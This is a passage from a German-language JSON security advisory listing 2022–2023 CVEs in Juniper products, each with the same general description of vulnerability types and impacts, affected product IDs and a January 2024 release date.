"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-1195"
},
{
"cve": "CVE-2023-0767",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-0767"
},
{
"cve": "CVE-2023-0461",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-0461"
},
{
"cve": "CVE-2023-0394",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-0394"
},
{
"cve": "CVE-2023-0386",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-0386"
},
{
"cve": "CVE-2023-0286",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-0286"
},
{
"cve": "CVE-2023-0266",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-0266"
},
{
"cve": "CVE-2022-47929",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-47929"
},
{
"cve": "CVE-2022-43945",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-43945"
},
{
"cve": "CVE-2022-4378",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-4378"
},
{
"cve": "CVE-2022-43750",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-43750"
},
{
"cve": "CVE-2022-42896",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-42896"
},
{
"cve": "CVE-2022-42722",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-42722"
},
{
"cve": "CVE-2022-42721",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-42721"
},
{
"cve": "CVE-2022-42720",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-42720"
},
{
"cve": "CVE-2022-42703",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-42703"
},
{
"cve": "CVE-2022-4269",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-4269"
},
{
"cve": "CVE-2022-4254",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-4254"
},
{
"cve": "CVE-2022-41974",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-41974"
},
{
"cve": "CVE-2022-41674",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-41674"
},
{
"cve": "CVE-2022-4139",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-4139"
},
{
"cve": "CVE-2022-4129",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
